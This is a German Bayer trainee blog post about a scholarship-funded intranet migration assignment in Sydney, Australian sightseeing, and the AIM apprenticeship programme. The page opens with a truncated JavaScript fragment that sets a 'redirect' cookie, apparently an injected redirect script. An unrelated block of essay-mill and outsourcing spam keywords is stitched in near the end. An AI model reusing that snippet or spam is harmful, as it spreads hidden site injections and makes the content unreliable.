=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} "/>

Austausch Ihrer personenbezogenen Daten mit Facebook


Wenn Sie auf "Akzeptieren" klicken, wird ein Programm von Facebook geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Facebook übermittelt und dort gespeichert sowie seitens Facebook Cookies auf Ihrem Rechner gesetzt und gelesen werden.
Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Facebook erhoben werden können.
Wenn Sie auf "Ablehnen"klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Facebook übertragen.
Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Facebook.

Ablehnen Akzeptieren

Austausch Ihrer personenbezogenen Daten mit Google


Wenn Sie auf "Akzeptieren" klicken, wird ein Programm von Google geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Google übermittelt und dort gespeichert sowie seitens Google Cookies auf Ihrem Rechner gesetzt und gelesen werden.
Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Google erhoben werden können.
Wenn Sie auf "Ablehnen"klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Google übertragen.
Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Google.

Ablehnen Akzeptieren

Austausch Ihrer personenbezogenen Daten mit YouTube


Wenn Sie auf "Akzeptieren" klicken, wird ein Programm von YouTube geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an YouTube übermittelt und dort gespeichert sowie seitens YouTube Cookies auf Ihrem Rechner gesetzt und gelesen werden.
Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von YouTube erhoben werden können.
Wenn Sie auf "Ablehnen"klicken, wird das Programm nicht geladen und keine personenbezogene Daten an YouTube übertragen.
Details hierzu entnehmen Sie bitte der Datenschutzerklärung von YouTube.

Ablehnen Akzeptieren

Startseite » Auszubildende » G’day Mate – so begrüßt man sich hier in Australien!
G’day Mate – so begrüßt man sich hier in Australien!

G’day Mate – so begrüßt man sich hier in Australien!

Mein Name ist Laureen, ich bin 21 Jahre alt und ich habe für zwei Monate im Pymble Office – einem australischen Bayer-Standort bei Sydney – gearbeitet. Wie es dazu kam? Das werde ich Euch in meinem Blogbeitrag erzählen:

Im August 2016 habe ich nach meinem Abitur das Aus- und Fortbildungsprogramm „Assistant for International Office Management“ – kurz: das „AIM-Programm“ – angefangen.

Palm Beach

Palm Beach

Seit anderthalb Jahren bin ich nun schon in meiner Fortbildungsabteilung, dem zweiten Teil des AIM-Programms, und arbeite bei der Bayer AG in der Kommunikationsabteilung – die Zeit vergeht wirklich wie im Fluge. Im Laufe der letzten zweieinhalb Jahre durfte ich verschiedene Bereiche des Unternehmens kennenlernen. Highlights hatte ich während meiner Zeit bei Bayer viele: Ich hatte zum Beispiel die Chance, sechs Wochen am Bayer-Standort in Barcelona eingesetzt zu werden, durfte große internationale Veranstaltungen mitorganisieren und habe die Möglichkeit bekommen, das ‚Cambridge‘- und ‚D.E.L.E‘-Sprachzertifikat zu erlangen. Mein absolutes Highlight bis jetzt war jedoch definitiv mein Auslandsaufenthalt in Sydney, Australien.

Aber wie bin ich überhaupt in Australien gelandet?

Harbour Bridge

Harbour Bridge

Im Sommer 2018 habe ich mich mit einem Projekt auf das Hermann-Strenger-Stipendium der Bayer-Stiftungen beworben. Mein Projekt war, die Migration des globalen BayerNet in Australien und Neuseeland zu unterstützen. Ein Intranet ist quasi ein internes Internetnetzwerk, welches von Mitarbeitern genutzt wird, um lokale, globale sowie divisionale Informationen an einem Ort zu finden. Meine Aufgaben sahen also wie folgt aus: Ich habe den Inhalt vom ehemaligen Intranet in das neue Intranet migriert. Besonders schön dabei war, dass ich mit verschiedenen Funktionen und Divisionen zusammenarbeiten durfte und somit viele Kollegen aus unterschiedlichen Bereichen kennengelernt habe. Nach unserem Launch-Day habe ich des Weiteren mehrere ‚Roadshows‘ organisiert, in welchen wir den Kollegen erklärt haben, wie man das neue Intranet benutzt und seine persönlichen Einstellungen richtig setzt. Ich habe Meetings für News-Editors aufgesetzt, um ihnen zu erklären wie man News und Announcements im neuen Intranet erstellt. Was mir besonders viel Spaß bereitet hat, war der redaktionelle Teil. Ich habe Artikel, News und Announcements geschrieben und im BayerNet veröffentlicht. Mein Auslandsaufenthalt in Sydney war eine wirklich tolle Erfahrung. Meine australischen Kollegen haben mich sehr herzlich aufgenommen und ich wurde direkt in alles integriert, um zum Beispiel mehr über das Business in Australien und Neuseeland zu erfahren. Die Arbeit in Australien hat mir wirklich sehr gut gefallen und war eine einmalige Erfahrung. Ich kann Euch nur nahelegen, solche Chancen immer zu nutzen – traut Euch! 🙂

Bondi Beach_Icebergs pool

Bondi Beach Icebergs pool

Ich bin sehr dankbar dafür, dass mir der Auslandseinsatz durch das Hermann-Strenger-Stipendium der Bayer-Stiftungen und die Unterstützung meiner Abteilung in Deutschland ermöglicht wurde. Dadurch konnte ich mich über meine Fortbildung hinaus noch in eine weitere, sehr spannende Richtung weiterentwickeln. Ich habe mich in Australien aber nicht nur beruflich, sondern auch persönlich weiterentwickelt. Ich durfte hier sehr viele schöne Erfahrungen sammeln und habe dabei nicht nur einige wunderschöne und interessante Orte gesehen, sondern auch die Offenheit und Herzlichkeit der Australier kennengelernt. Die Australier unterscheiden sich meiner Meinung nach mit ihrer Freundlichkeit wirklich vom Rest der Welt! Die Arbeit und Mühe, die ich hier zuvor investiert habe, haben sich also definitiv gelohnt! 🙂

Jetzt zu meiner Freizeitgestaltung in Australien

Während meines Aufenthalts in Australien habe ich versucht, meine Freizeit optimal zu nutzen. Es gibt in Sydney und Umgebung einfach zu viele beeindruckende Orte, die man unbedingt gesehen haben sollte!

So habe ich beispielsweise mit Freunden einen Tagesausflug nach Jervis Bay gemacht.

Jervis Bay

Jervis Bay

Der Strand in Jervis Bay soll wohl der weißeste der Welt sein und den weltbesten Donut konnte ich auf dem Rückweg in Berry probieren. Ein weiteres Highlight waren unteranderem die Blue Mountains – ein sehr schöner Nationalpark, durch den man viele großartige Wanderwegen machen kann. Ansonsten gibt es in Sydney selber noch so viel zu sehen! Es gibt sehr viele Strände, sowohl an der Küste als auch im Hafen. Am liebsten habe ich die Fähre zum Manly Beach genommen. Fähren gehören zu den öffentlichen Verkehrsmitteln in Sydney und sind meiner Meinung nach die beste Art, um von A nach B zu kommen. An den Wochenenden habe ich viel mit Freunden unternommen, um zum Beispiel viele Orte in der Stadt zu erkunden oder zu wandern.  Am besten hat mir der Coastal Cliff Walk von Dover Heights nach Watsons Bay gefallen, es gibt aber noch einige andere Wanderwege, wie zum Beispiel der Spit Bridge to Manly Walk oder der Bondi to Coogee Walk. Dabei konnte man immer viel von der Natur sehen und hatte teilweise wirklich beeindruckende Aussichten. Mein absolutes Highlight war jedoch der Harbour Bridge Climb. Die Harbour Bridge ist 134 Meter hoch und der ganze Climb hat insgesamt um die 4 Stunden gedauert. Ganz oben angekommen hatte man dann eine atemberaubende 360 Grad Aussicht über Sydney – das kann ich wirklich nur empfehlen!

Und was genau ist nun das „AIM-Programm“?

Das AIM-Programm ist eine Aus- und Fortbildung mit Fremdsprachenschwerpunkt. Das Programm ist in zwei Teile aufgeteilt: Zuerst macht man eine Ausbildung zum/zur Kaufmann/frau für Büromanagement und anschließend eine Fortbildung zum/zur Fachwirt/in für Büro- und Projektorganisation. Was ist das Besondere am AIM-Programm? AIMs machen die Ausbildung in 1,5 anstatt in 3 Jahren – somit haben wir einen großen Zeitvorteil! Normalerweise bräuchte man 5 Jahre, um die Ausbildung und im Anschluss die Fortbildung abzuschließen. AIMs verkürzen allerdings auf knapp 3,5 Jahre. Des Weiteren machen wir wie schon erwähnt zwei international anerkannte Sprachzertifikate in Englisch und Spanisch. Der Arbeitstag einer AIM kann jeden Tag anders aussehen, denn man hat viele verschiedene Aufgaben, sowohl im Assistenzbereich, als auch im Projektmanagement. Zum Beispiel bucht man an einem Tag eine Geschäftsreise für einen Kollegen und rechnet diese anschließend ab oder man koordiniert verschiedene Termine und Meetings. Was mir besonders viel Spaß macht, ist die Projektarbeit. Es ist eine tolle Erfahrung, wenn man dabei unterstützen kann, Projekte von Anfang an mit zu organisieren und anschließend durchzuführen, wie zum Beispiel die Veranstaltung eines großen Events.

Ich kann Euch das AIM-Programm sehr weiterempfehlen, da mir im Rahmen des Programms schon viele tolle Möglichkeiten geboten wurden. Also bewerbt Euch! 🙂

buy essay papers
write my essay writing services academic paper buy essay essay writing do my paper custom writing writing services check my essay academic paper assignment writing cheap essay writing professional writing best essay writing service argumentative essay writer custom essay custom essay paper writing write my essay website
is magento the best ecommerce platform offshore outsourcing companies list offshore outsourcing company offshore outsourcing company india offshore outsourcing india offshore outsourcing services offshore outsourcing services india offshore outsourcing software development offshore outsourcing software development company offshore outsourcing solutions
Allgemeine Nutzungsbedingungen Datenschutzerklärung Impressum Technische Hinweise
Austausch Ihrer personenbezogenen Daten mit Facebook
Wenn Sie auf “Akzeptieren” klicken, wird ein Programm von Facebook geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Facebook übermittelt und dort gespeichert sowie seitens Facebook Cookies auf Ihrem Rechner gesetzt und gelesen werden.

Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Facebook erhoben werden können.

Wenn Sie auf “Ablehnen” klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Facebook übertragen.

Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Facebook.

×
Austausch Ihrer personenbezogenen Daten mit Google
Wenn Sie auf “Akzeptieren” klicken, wird ein Programm von Google geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Google übermittelt und dort gespeichert sowie seitens Google Cookies auf Ihrem Rechner gesetzt und gelesen werden.

Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Google erhoben werden können.

Wenn Sie auf “Ablehnen” klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Google übertragen.

Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Google.

×
Austausch Ihrer personenbezogenen Daten mit YouTube
Wenn Sie auf “Akzeptieren” klicken, wird ein Programm von YouTube geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an YouTube übermittelt und dort gespeichert sowie seitens YouTube Cookies auf Ihrem Rechner gesetzt und gelesen werden.

Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von YouTube erhoben werden können.

Wenn Sie auf “Ablehnen” klicken, wird das Programm nicht geladen und keine personenbezogene Daten an YouTube übertragen.

Details hierzu entnehmen Sie bitte der Datenschutzerklärung von YouTube.

×